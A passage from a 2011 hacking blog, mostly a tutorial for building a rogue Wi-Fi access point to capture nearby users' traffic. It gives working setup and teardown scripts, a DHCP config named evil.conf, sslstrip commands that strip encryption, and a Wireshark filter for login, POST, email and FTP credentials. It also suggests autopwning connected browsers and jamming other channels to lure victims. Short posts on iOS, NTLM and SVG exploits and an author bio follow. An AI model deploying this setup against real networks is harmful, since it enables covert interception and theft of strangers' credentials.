Monday, October 10, 2011

Passive Wireless Sniffing Attack

So first off, sorry for the down time, I've been moving around a lot, trying a lot of things. I really like doing this so I thought bringing a quality tutorial to the blog might help a little.

The purpose of this tutorial is to teach you how to to make a wireless access point solely for the purpose of sniffing. It's great for networks where you can't perform ARP spoofing, and wireless is in the mix. There are a lot of possibilities for this attack but, I am only going to cover the basics.

First though, props to qnix over at 0x80, he wrote the blog post that helped inspire this one.

Let's get started >:D

So we begin with a simple plan. Create a wireless access point that bridges our ethernet port with our wireless card. (Just for your sanity: I have tried doing the wlan -> wlan bridging and it ended up with A LOT of headaches. From suddenly the AP having a hidden SSID, a setting I turned off, to DNS issues I felt it best to go through eth0) We need to do a couple of basic things:
  • Create a soft AP
  • Assign IP addresses
  • Sniff the traffic
  • Filter out things that may hinder our sniffing (SSL)
  • Bridge the two adapters
  • Put it all into script form so we can access it whenever
We've got some work to do as most of these are easier said than done.

THE TOOLS:
  • Software
    • The aircrack-ng suite
    • sslstrip
    • dhcp3d
  • Hardware
    • Computer (No fucking duh)
    • Wireless card (Preferably the extremely sexy Alfa AWUS036H)
  • Knowledge
    • DHCP 
    • DNS
    • Linux network interfaces
OK now let's actually get started.

Airbase-ng:
First, we need to start airbase-ng. We turn our cards to monitor mode,
airmon-ng start [if]
Then we just start airbase-ng
airbase-ng -e "[name of network]" -c [channel] [if (Most likely mon0)]
Now we are off to the painful part.

Scripting it up:
setup.sh [if] [gateway] (If you have to edit evil.conf, edit this too.)
#! /bin/bash
ifconfig at0 up
ifconfig $1 up
ifconfig at0 192.168.3.1 netmask 255.255.255.0
route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface $1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $2

#brctl addbr mitm
#brctl addif mitm $1
#brctl addif mitm at0
#ifconfig mitm up

cp evil.conf /etc/dhcp3/evil.conf
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/
dhcpd3 -d -f -cf /etc/dhcp3/evil.conf at0
destroy.sh [if]
#! /bin/bash
ifconfig at0 down
ifconfig $1 down
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 0 > /proc/sys/net/ipv4/ip_forward

killall -9 dhcpd3

ifconfig $1 up

ifdown $1
ifup $1
evil.conf (You will probably need to edit this)
option domain-name-servers 192.168.1.1;
default-lease-time 600;
max-lease-time 720;

ddns-update-style none;
authoritative;
log-facility local7;

subnet 192.168.3.0 netmask 255.255.255.0 {
range 192.168.3.100 192.168.3.254;
option routers 192.168.3.1;
option ip-forwarding on;
option domain-name-servers 192.168.1.1;
}

Hefty, let's explain what's going on here.

So first up we got setup.sh. This does a whole host of things, mainly sets up the DHCP stuff, let's chug through it piece by piece.

The first part,
ifconfig at0 up
ifconfig $1 up
turns on at0, the sniffing interface that airbase-ng creates.  Then ensures that the interface that is going to be bridged is up.

Let's get more gory.
ifconfig at0 192.168.3.1 netmask 255.255.255.0
route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface $1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $2
Happy, right? This sets up most of the IP routing tables and the other painful stuff. this might need more tweaking if you have a different network set up, however, it should work for most people. I'm not going to get to far into this as it's pretty self explanatory for anyone who has had to deal with iptables before.

#brctl addbr mitm
#brctl addif mitm $1
#brctl addif mitm at0
#ifconfig mitm up
This section is commented out but, I left it there for a specific purpose. It is supposed to be easier to use brctl (Bridge Control) to bridge the adapters but, it acts weird and I couldn't get DNS updates. I'll give a nickel to anyone who can make this work :3.

cp evil.conf /etc/dhcp3/evil.conf
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/
dhcpd3 -d -f -cf /etc/dhcp3/evil.conf at0
This sets up our dhcp server.  Basically, it just copies our evil.conf file into the dhcp3 folder, does some directory making / owning and then starts DHCP on at0 using that conf file. 

Next we have destroy.sh which will just fix the changes and remove the bridge. It also will kill DHCP.

Lastly we may need to edit the evil.conf file. The only lines you should need to edit is the top one,
option domain-name-servers 192.168.1.1;
and this section
subnet 192.168.3.0 netmask 255.255.255.0 {
range 192.168.3.100 192.168.3.254;
option routers 192.168.3.1;
option ip-forwarding on;
option domain-name-servers 192.168.1.1;
}
Usually you will just edit for subnets (EX changing the subnet from 192.168.3.0 to 192.168.6.0) However if you do, be sure to change the corresponding values in setup.sh

Putting It All Together:
Next we just run the scripts, make sure that airbase-ng is up so that way at0 is present or else this will just error out.

Just run:
./setup.sh [if] [gateway]
This will keep dhcp in verbose mode and lets you know when new people connect. You may want to run sslstrip next. This strips ssl elements out of a page so it forces and unencrypted connection.
./sslstrip.py -k -a -f
Lastly just run wireshark on at0, with this display filter:
http.request.method == POST || http.request.method == GET || http.request.uri contains login || pop.request.command || imap.response == 1|| ftp.request.command
There are a couple extra things you can do after this.

For starts you can do what is suggested in the article on 0x80 and run an exploit server autopwning any browser that connects. However, the drawback to this is that Windows will notify you of a limited connection and that might make people switch networks as they can't access the internet.

The other one I thought of was to use:
airbase-ng -P mon0
This responds to all probes even if they specify an ESSID, this will let you hijack others networks as long as you have a better signal strength. However the drawback is that most people WILL have a better connection strength with their original router.

The best one I could think of was to use wifijammer to block all signals on all channels except yours (use a non-used channel like 4 or whatever). This will make people want to connect to you as everyone else's connection doesn't work. There are still drawbacks, like, will they actually know HOW to connect to a new wifi network. Some people are just that special.

Either way hope this helps, a good section was taken from 0x80, most of the credit goes to him and the community.

Monday, May 30, 2011

Free Hacking Note Book!

Hey all,
So I started re-writing a resource I have building for the past year I call the Hacker's Note Book. Essentially it is a huge document that is filled with pretty much all the knowledge I have on the subject of hacking. I will release it it a couple weeks and plan to write a couple tutorials on the way. I have recently been thinking about writing a tutorial on brute-forcing passwords as I keep getting requested for one. I am deciding on whether I should write about ncrack or medusa. 

Tuesday, March 1, 2011

No iPhone is Safe. Surge of Exploits Raises Questions.

I'm no fan of Apple. Their proprietary bullshit and overpriced, last-gen hardware irks me to say the least. However, as a penetration tester, the common Apple lie always gets me. "Apple products can't get viruses". Don't make me fucking laugh. The truth is that Macs are just as vulnerable to exploits as any other OS, any penetration tester knows this simple truth. However, you can still hear the same old rhetoric from an Apple fanboy, that Apple products are just simply invulnerable to attacks. The only reason Macs haven't been targeted like Windows and Linux is simply because of market share. If Macs were to gain a larger market share it would get ruined by the amount of new exploits and viruses. Nothing has been more proof of that than iOS, who has gained a considerable amount of market share in the mobile OS division. iOS runs OSX in the backend and (here's the kicker) exploit-db now has 13 exploits ,all released in around 3 days ,that details many exploits for iOS systems. Luckily,  they are not OS exploits but, program exploits.

Why is iOS so exploitable? We can simply look the how Apple is run for that. Apple not only locks down their firmware but, releases updates on their horrid update schedule. Bad update schedule equals better exploitability. Next, most people have absolutely no control on the actual security of the device unless they have jailbroken it. If you can't turn off insecure services on the device, you aren't secure. I hate that Apple treats their customers like babies and, in turn, treats their customers data in an insecure fashion. Lastly, the developers for the platform tend to write insecure code. Developers usually are start-up companies who have little to no security training and, therefore, will write bad code.

I can only hope that most of this get resolved quickly but, that is up to the discretion of the app developers. Now that iOS is popular, it is possible that we will see a wave of new default service exploits and not just app exploits.At least it will give us all some sort of stability on the whole thing as it will force Apple to actually patch their software.

Sunday, February 6, 2011

Mulling Through the Windows NTLM Weak Nonce Vulnerability

As of late there have been relatively few Windows 7 exploits, the only major ones were a DoS attack using SMB, and a UAC code-injection bypass attack. However, a new exploit surfaced about a month ago detailing an exploit capable of bypassing SMB user credentials by using repeated challenges. The whole thing (documented here) works similarly to the infamous SMB credential reflection attack. It involves repeatedly spamming a computer with SMB Negotiate Protocol Requests and logging the challenges that result. Then the computer is forced to connect to a JavaScript page that repeatedly connects back to the attacker. The attacker listens for similar challenges and when it receives a challenge that it knows, it replays the challenge. The sad part is that similar to the aforementioned SMB credential reflection attack, the exploit has been around for a pretty long time, 17 years. The exploit was released on the Microsoft site sometime last year and the exploit-PoC was posted about a month ago.

MS10-081 SVG Issues! (YAY)

So back at the beginning of the year a new exploit appeared on exploit-db.com concerning SVG graphics. The whole issue had to do with a third party plugin dealing with yet another Adobe plug-in. This time it was Adobe SVG Viewer. (Last September it was flash and PDF exploits) Apparently the patch has already gone out and in fact, was the very thing that made finding the exploit possible. (You can read more about the beauty of this hack, here) Now, this hack only works for Windows XP SP3 (or so I am told) and has already been patch (So it looks like most are safe for now)

Welcome to FOPTA!

Hi,
My name is Ian Rash and I run an online penetration testing academy from YouTube. I have been studying computers since I was in the fifth grade. I began programming in BASIC and eventually went on to take classes at Irvine Valley College, in middle school, for A+ and Network+. I passed both classes. I began studying security when I was in high school about 2 years ago. I came to love the world of pen testing and now I run a course online dedicated to the subject. I hope to do some text tutorials on the blog so stay tuned for extra lessons. :)